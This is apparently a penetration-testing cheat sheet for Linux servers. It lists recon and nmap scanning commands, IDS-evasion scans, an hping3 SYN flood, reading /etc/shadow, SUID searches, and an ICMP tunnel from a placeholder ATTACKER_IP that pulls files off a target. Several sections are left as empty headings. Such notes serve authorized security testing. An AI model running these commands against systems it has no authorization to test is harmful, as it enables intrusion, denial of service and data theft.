Pentesting a Linux Server

The first, most logical thing to find out is for what purpose the server is being used. This, along with other basic information guides the rest of the test.

1. Recon

dig example.com

whois

• ipinfo.io
• mxtoolbox.com

OSINT

git clone https://github.com/laramies/theHarvester.git

2. Scanning & Enum

If scanning a whole network, find out who is up first:

nmap -sn 192.168.1.0/24 -oG - | awk '/Up$/{print $2}' > active_hosts.txt

Then scan only those hosts to learn which services are running and which common ports are open.

nmap -sV -iL active_hosts.txt

Further scanning or targeted scanning may also necessitate running default scripts and if it is a webserver, perhaps also run the --script http-enum script.

nmap -sC --script http-enum 192.168.1.10 

A Note on Noise

The method above has a goal of being moderately discreet by first doing a ping sweep and then doing more targeted discovery. If being detected is not of concern, a TCP connect scan could produce more detailed results.

The Noisy Way

nmap -sT -vv -oA network-topology <ip.addr/24>

Grab our list of open IPs:

grep open network-topology.gnmap | cut -d" " -f 2 > device_list.txt

Rescan network agressively for additional IPs at the exclusion of open IP list:

nmap -A --excludefile device_list.txt 192.168.1.0/24

Add any additional IPs found to the list:

echo "192.168.1.48" >> device_list.txt

Now rerun scan of the found IPs aggressively, but remove the ping as we no longer need to discover hosts:

nmap -Pn -A -iL device_list.txt

The Quiet Way

If being more stealthy is necessary, here are some other options to consider:

Stealth Scan

Note: May be detected by intrusion detection systems (IDS)

nmap -sS -T4 192.168.0.1-254

FIN Scan

nmap -sF 192.168.0.1-254

Save Noted IPs to a File

nano scan_targets.txt

UDP Scan

nmap -sU -iL scan_targets.txt -oA target_data.txt

Avoid IDS with XMAS Scan (IDS tend to detect Stealth Scans)

nmap -sX -iL scan_targets.txt -oA XMAS_data.txt

Based on the services/versions running

searchsploit serviceName versionNumber

searchsploit -w Apache

Gobuster

Find Web Pages

gobuster dir -u http://example.com -w /usr/share/wordlists/dirb/common.txt 

-u -w

-u : The URL to scan. -w : Path to the wordlist to use for brute forcing.

Find Subdomains

gobuster dns -d example.com -w /usr/share/wordlists/subdomains-top1million-110000.txt -r 8.8.8.8

-d -w -r

-d : The target domain for which you want to find subdomains. -w : Path to the wordlist you will use for subdomain brute-forcing. -r : Specifies the DNS resolver to use.

Test Firewall

Simulate a SYN Flood Attack to stress test the network or firewall.

hping3 -S -V --flood 192.168.1.10

Evading firewall rules is possible if you specify your ports. Here's an example:

hping3 --traceroute -V -p 80 -S -A --baseport 1337 thecurious.cloud

Fork in the Road

Where you go next depends heavily on what you've found so far.

A. Web Server

Visit the website through curl or browser.

curl http://example.com

Test any input fields for command injection after first seeing how they handle correct input.

B. SQL Server

C. FTP Server

D. Print Server

3. Initial Access

4. Persistence

Get the Lay of the Land

What's running?

ps aux

Who's logged in?

w

Who was logged in?

last

What's happening on the network?

netstat -pantu

or the newer, more detailed:

ss -tulpn

OS Info

cat /etc/os-release

System Architecture Info

uname -a

cat /etc/passwd

cat /etc/shadow

Check if Python is Insalled

ls /bin

Install/Create LinEnum

./linenum

5. Privilege Escalation

Checking GUID/SUID files

find / -perm -4000 -type f 2>/dev/null

Iterate through each of the results to determine if any permissions need to be changed.

find / -perm -2000 -type f 2>/dev/null

Checking for writeable directories

find / -type d -writable 2>/dev/null

Find writable directories in the PATH

echo $PATH | tr ':' '\n' | while read p; do find "$p" -writable -type d 2>/dev/null; done

Adjust Permissions

Adjust the permissions so that users and services have only the necessary rights to perform their duties. Use usermod and groupmod for this. In Windows, you can manage user permissions through the Local Users and Groups Manager or PowerShell.

Add User to a Group

sudo usermod -aG groupName username

6. Exfil

Sometimes attackers will evade firewall rules by exfiltrating data over ICMP when traditional TCP/UDP traffic is blocked.

Scenario

• TARGET_IP is running SSH service and has data the attacker wants.
• ATTACKER_IP will be used to initiate the tunnel and attempt connection onto the TARGET_IP.
• PROXY_IP will be the ICMP proxy server through which the ICMP packets will be relayed between the TARGET_IP and the ATTACKER_IP.

From PROXY_IP Box Setup

Set up NAT so that the traffic appears to come from the PROXY_IP and not the ATTACKER_IP
(This assumes the shared network interface for the PROXY_IP and the TARGET_IP is eth0.)

# Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward

# Set up IP masquerading
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

Initiate the tunnel service

ptunnel

From ATTACKER_IP Box Setup

ptunnel -p TARGET_IP -lp 8000 -da TARGET_IP -dp 22

-p = target, -lp = local port, -da = destination address, -dp = destination port

From ATTACKER_IP connect to SSH via the tunnel

ssh -p 8000 TARGET_USERNAME@localhost

or

scp -P 8000 TARGET_USERNAME@localhost:~/data.txt .

7. Analysis & Reporting

8. Remediation and Re-testing